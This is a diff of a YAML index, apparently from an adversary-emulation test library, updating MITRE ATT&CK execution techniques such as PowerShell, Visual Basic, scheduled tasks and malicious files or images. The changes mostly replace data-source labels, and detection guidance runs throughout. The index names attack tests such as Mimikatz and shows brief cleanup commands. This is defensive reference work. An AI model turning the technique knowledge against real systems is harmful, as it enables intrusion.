@@ -54031,17 +57430,20 @@ execution: x_mitre_detection: |- Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source. + Monitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system. + Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. x_mitre_data_sources: - - Loaded DLLs - - DLL monitoring - - File monitoring - - Process command-line parameters - - Process monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Script: Script Execution' x_mitre_platforms: - Windows - macOS - Linux + x_mitre_contributors: + - Cody Thomas, SpecterOps atomic_tests: [] T1569.001: technique: 
@@ -54084,9 +57486,10 @@ execution: disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Service: Service Creation' + - 'File: File Modification' x_mitre_platforms: - macOS identifier: T1569.001 @@ -54164,9 +57567,10 @@ execution: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement." x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_platforms: - macOS identifier: T1053.004 
@@ -54201,43 +57605,42 @@ execution: sudo rm /private/var/db/emondClients/#{empty_file} T1204.002: technique: - external_references: - - source_name: mitre-attack - external_id: T1204.002 - url: https://attack.mitre.org/techniques/T1204/002 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Malicious File + created: '2020-03-11T14:49:36.954Z' + modified: '2020-03-11T14:55:56.177Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + id: attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e description: |- An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). 
- id: attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-03-11T14:55:56.177Z' - created: '2020-03-11T14:49:36.954Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. - - Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe). - x_mitre_data_sources: - - Anti-virus - - Process command-line parameters - - Process monitoring + name: Malicious File + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1204.002 + url: https://attack.mitre.org/techniques/T1204/002 x_mitre_platforms: - Linux - macOS - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'File: File Creation' + x_mitre_detection: |- + Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. 
+ + Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe). + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1204.002 atomic_tests: - name: OSTap Style Macro Execution 
@@ -54584,6 +57987,55 @@ execution: cleanup_command: 'Remove-Item #{pua_file} ' + T1204.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1204.003 + url: https://attack.mitre.org/techniques/T1204/003 + - source_name: Summit Route Malicious AMIs + url: https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/ + description: Piper, S.. (2018, September 24). Investigating Malicious AMIs. + Retrieved March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Malicious Image + description: |- + Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs) + + Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)). 
+ id: attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-12T17:54:08.797Z' + created: '2021-03-30T17:20:05.789Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor the local image registry to make sure malicious images + are not added. Track the deployment of new containers, especially from newly + built images. Monitor the behavior of containers within the environment to + detect anomalous behavior or malicious activity after users deploy from malicious + images. + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + x_mitre_platforms: + - IaaS + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Container: Container Start' + - 'Command: Command Execution' + - 'Image: Image Creation' + - 'Instance: Instance Creation' + - 'Instance: Instance Start' + - 'Application Log: Application Log Content' + atomic_tests: [] T1204.001: technique: created: '2020-03-11T14:43:31.706Z' @@ -54614,9 +58066,9 @@ execution: - macOS - Windows x_mitre_data_sources: - - Anti-virus - - Process monitoring - - Web proxy + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'File: File Creation' x_mitre_detection: |- Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization. 
@@ -54628,14 +58080,17 @@ execution: atomic_tests: [] T1106: technique: - created: '2017-05-31T21:31:17.472Z' - modified: '2020-07-01T16:19:54.646Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Native API + description: |- + Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. + + Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) + + Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. 
These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) + + Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system. external_references: - source_name: mitre-attack external_id: T1106 
@@ -54682,26 +58137,21 @@ execution: - source_name: macOS Foundation url: https://developer.apple.com/documentation/foundation description: Apple. (n.d.). Foundation. Retrieved July 1, 2020. - description: |- - Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. - - Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) - - Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) - - Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system. 
- name: Native API - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670 - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - System calls - - Loaded DLLs - - API monitoring - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2020-07-01T16:19:54.646Z' + created: '2017-05-31T21:31:17.472Z' + x_mitre_platforms: + - Windows + - macOS + - Linux + x_mitre_remote_support: false + x_mitre_permissions_required: + - User x_mitre_detection: "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish @@ -54715,13 +58165,13 @@ execution: to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. " - x_mitre_permissions_required: - - User - x_mitre_remote_support: false - x_mitre_platforms: - - Windows - - macOS - - Linux + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Module: Module Load' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false identifier: T1106 atomic_tests: - name: Execution through API - CreateProcess @@ -54784,10 +58234,7 @@ execution: modified: '2020-10-22T16:43:38.388Z' created: '2020-10-20T00:09:33.072Z' x_mitre_data_sources: - - Network device logs - - Network device run-time memory - - Network device command history - - Network device configuration + - 'Command: Command Execution' x_mitre_platforms: - Network x_mitre_is_subtechnique: true 
@@ -54802,25 +58249,6 @@ execution: atomic_tests: [] T1059.001: technique: - created: '2020-03-09T13:48:55.078Z' - modified: '2020-06-24T13:51:22.360Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - type: attack-pattern - id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736 - description: |- - Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). - - PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. - - A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) - - PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). 
(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) - name: PowerShell - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1059.001 
@@ -54853,30 +58281,46 @@ execution: description: Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. source_name: FireEye PowerShell Logging 2016 - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Windows event logs - - Process monitoring - - Process command-line parameters - - PowerShell logs - - Loaded DLLs - - File monitoring - - DLL monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: PowerShell + description: |- + Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). + + PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. + + A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) + + PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). 
(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) + id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2020-06-24T13:51:22.360Z' + created: '2020-03-09T13:48:55.078Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_remote_support: true x_mitre_detection: |- If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. 
- x_mitre_remote_support: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' + x_mitre_contributors: + - Praetorian + x_mitre_platforms: + - Windows identifier: T1059.001 atomic_tests: - name: Mimikatz @@ -55351,10 +58795,8 @@ execution: Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. x_mitre_data_sources: - - System calls - - Process monitoring - - Process command-line parameters - - API monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_platforms: - Linux - Windows @@ -55522,6 +58964,16 @@ execution: ' T1053.005: technique: + created: '2019-11-27T14:58:00.429Z' + modified: '2020-12-30T14:26:44.730Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1053.005 
@@ -55557,16 +59009,6 @@ execution: An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:03.730Z' - created: '2019-11-27T14:58:00.429Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_remote_support: true @@ -55588,10 +59030,10 @@ execution: Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_platforms: - Windows identifier: T1053.005 
@@ -55754,16 +59196,6 @@ execution: ' T1053: technique: - created: '2017-05-31T21:30:46.977Z' - modified: '2020-10-14T15:20:01.069Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Scheduled Task/Job @@ -55784,10 +59216,21 @@ execution: source_name: TechNet Task Scheduler Security object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-20T16:31:11.405Z' + created: '2017-05-31T21:30:46.977Z' x_mitre_platforms: - Windows - Linux - macOS + - Containers x_mitre_remote_support: true x_mitre_effective_permissions: - SYSTEM @@ -55808,16 +59251,18 @@ execution: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement." x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'File: File Creation' + - 'Container: Container Creation' + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_contributors: - Prashant Verma, Paladion - Leo Loobeek, @leoloobeek - Travis Smith, Tripwire - Alain Homewood, Insomnia Security - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_is_subtechnique: false atomic_tests: [] T1064: 
@@ -55881,10 +59326,6 @@ execution: - Process whitelisting - Data Execution Prevention - Exploit Prevention - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Process command-line parameters x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_deprecated: true @@ -55923,9 +59364,10 @@ execution: x_mitre_platforms: - Windows x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute @@ -56070,10 +59512,8 @@ execution: and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior." x_mitre_data_sources: - - API monitoring - - DLL monitoring - - File monitoring - - Process monitoring + - 'Process: OS API Execution' + - 'Module: Module Load' x_mitre_contributors: - Stefan Kanthak x_mitre_version: '2.0' 
@@ -56090,7 +59530,7 @@ execution: source_name: capec url: https://capec.mitre.org/data/definitions/187.html description: |- - Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). + Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. @@ -56104,18 +59544,13 @@ execution: phase_name: execution - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T15:27:01.403Z' + modified: '2020-12-11T17:00:00.938Z' created: '2017-05-31T21:30:57.201Z' x_mitre_is_subtechnique: false x_mitre_version: '2.1' x_mitre_data_sources: - - Authentication logs - - File monitoring - - Third-party application logs - - Windows Registry - - Process monitoring - - Process use of network - - Binary file metadata + - 'Application Log: Application Log Content' + - 'Process: Process Creation' x_mitre_detection: "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities 
@@ -56184,10 +59619,6 @@ execution: processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring. - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Process command-line parameters x_mitre_version: '2.0' atomic_tests: [] T1569: @@ -56225,10 +59656,11 @@ execution: files associated with services. Changes to Windows services may also be reflected in the Registry. x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Service: Service Creation' + - 'File: File Modification' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_platforms: - Windows - macOS @@ -56285,9 +59717,10 @@ execution: x_mitre_contributors: - SarathKumar Rajendran, Trimble Inc x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_detection: |- Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. 
@@ -56386,9 +59819,8 @@ execution: - macOS - Linux x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would @@ -56451,12 +59883,6 @@ execution: name: sh T1204: technique: - created: '2018-04-18T17:59:24.739Z' - modified: '2020-03-11T14:55:56.315Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: 
@@ -56470,11 +59896,25 @@ execution: name: User Execution created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5 - x_mitre_version: '1.2' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-20T16:34:09.236Z' + created: '2018-04-18T17:59:24.739Z' + x_mitre_version: '1.3' x_mitre_data_sources: - - Anti-virus - - Process command-line parameters - - Process monitoring + - 'Application Log: Application Log Content' + - 'Instance: Instance Start' + - 'Instance: Instance Creation' + - 'Image: Image Creation' + - 'Command: Command Execution' + - 'Container: Container Start' + - 'Container: Container Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'File: File Creation' + - 'Process: Process Creation' x_mitre_detection: |- Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. 
@@ -56485,23 +59925,20 @@ execution: - Linux - Windows - macOS + - IaaS + - Containers x_mitre_contributors: - Oleg Skulkin, Group-IB x_mitre_is_subtechnique: false atomic_tests: [] T1059.005: technique: - id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67 - description: |- - Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) - - Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) - - Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. 
- name: Visual Basic - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2020-03-09T14:29:51.508Z' + modified: '2020-08-13T20:09:39.122Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1059.005 
@@ -56526,32 +59963,36 @@ execution: url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85) description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-08-13T20:09:39.122Z' - created: '2020-03-09T14:29:51.508Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_data_sources: - - DLL monitoring - - Loaded DLLs - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Visual Basic + description: |- + Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. 
